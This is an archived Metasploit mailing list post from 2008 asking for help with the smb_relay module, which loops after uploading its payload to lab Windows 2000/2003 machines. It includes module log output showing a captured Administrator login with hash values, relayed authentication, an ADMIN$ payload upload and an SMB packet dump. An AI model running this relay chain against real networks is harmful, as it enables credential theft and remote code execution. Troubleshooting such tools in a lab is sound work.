Metasploit mailing list archives
Issue with smb_relay
From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Thu, 20 Nov 2008 23:49:06 +0100
Hello, I have an issue with smb_relay module. My configuration is the following: - Attacker = Ubuntu 8.04 with either framework 3.2-rel or 3.3-svn. - Victim = either Windows 2000 SP4 or Windows 2003 SP2 "out of the box" virtual machines (French versions of Windows). I tried all framework/victim combinations, but none worked. Plugin output is: ------------------------------------------------------------------ 21:12:46 - Initialized the Metasploit Framework GUI. 21:14:24 - smb_relay [*] Launching exploit windows/smb/smb_relay... 21:14:25 - smb_relay [*] Server started. 21:14:30 - smb_relay [*] Received 192.168.0.129:1033 TEST2K3\Administrator LMHASH:9c69c0a7006c4b69ebdf16cdbd78d62abc1d6dc8cc6ef82b NTHASH:9c69c0a7006c4b69ebdf16cdbd78d62abc1d6dc8cc6ef82b OS:Windows Server 2003 R2 3790 Service Pack 2 LM: 21:14:30 - smb_relay [*] Authenticating to 192.168.0.129 as TEST2K3\Administrator... 21:14:30 - smb_relay [*] AUTHENTICATED as TEST2K3\Administrator... 21:14:30 - smb_relay [*] Connecting to the ADMIN$ share... 21:14:30 - smb_relay [*] Regenerating the payload... 21:14:30 - smb_relay [*] Uploading payload... 21:14:30 - smb_relay [*] Created \KiTOBqaK.exe... 21:14:30 - smb_relay [*] Connecting to the Service Control Manager... ------------------------------------------------------------------ At this point, the binary file has been successfully uploaded on the victim. Then the module goes into infinite looping while communicating with the SCM. It seems that both keep exchanging SMB packets with 0-sized payload (packets dumped below). PS. It tried the SOMBI stuff also (mentioned before on this list), but I failed to see how that stuff could be more than a "proof of concept". Regards, - Nicolas RUFF #1 192.168.0.128 -> 192.168.0.129 SMB Read AndX Request, FID: 0x4001, 0 bytes at offset 186 SMB (Server Message Block Protocol) SMB Header Server Component: SMB [Response in: 236] SMB Command: Read AndX (0x2e) Error Class: Success (0x00) Reserved: 00 Error Code: No Error Flags: 0x18 Flags2: 0x2001 Process ID High: 0 Signature: 0000000000000000 Reserved: 0000 Tree ID: 2049 Process ID: 61626 User ID: 2048 Multiplex ID: 3431 Read AndX Request (0x2e) Word Count (WCT): 10 AndXCommand: No further commands (0xff) Reserved: 00 AndXOffset: 0 FID: 0x4001 Offset: 186 Max Count Low: 0 Min Count: 0 [File Offset: 186] [File RW Length: 0] Remaining: 0 Byte Count (BCC): 0 #2 192.168.0.129 -> 192.168.0.128 SMB Read AndX Response, 0 bytes SMB (Server Message Block Protocol) SMB Header Server Component: SMB [Response to: 235] [Time from request: 0.000436000 seconds] SMB Command: Read AndX (0x2e) Error Class: Success (0x00) Reserved: 00 Error Code: No Error Flags: 0x98 Flags2: 0x2001 Process ID High: 0 Signature: 0000000000000000 Reserved: 0000 Tree ID: 2049 Process ID: 61626 User ID: 2048 Multiplex ID: 3431 Read AndX Response (0x2e) Word Count (WCT): 12 AndXCommand: No further commands (0xff) Reserved: 00 AndXOffset: 0 [File Offset: 186] [File RW Length: 0] Remaining: 0 Data Compaction Mode: 0 Reserved: 0000 Data Length Low: 0 Data Offset: 0 Data Length High (multiply with 64K): 0 Reserved: 000000000000 Byte Count (BCC): 0
Current thread:
- Issue with smb_relay Nicolas RUFF (Nov 20)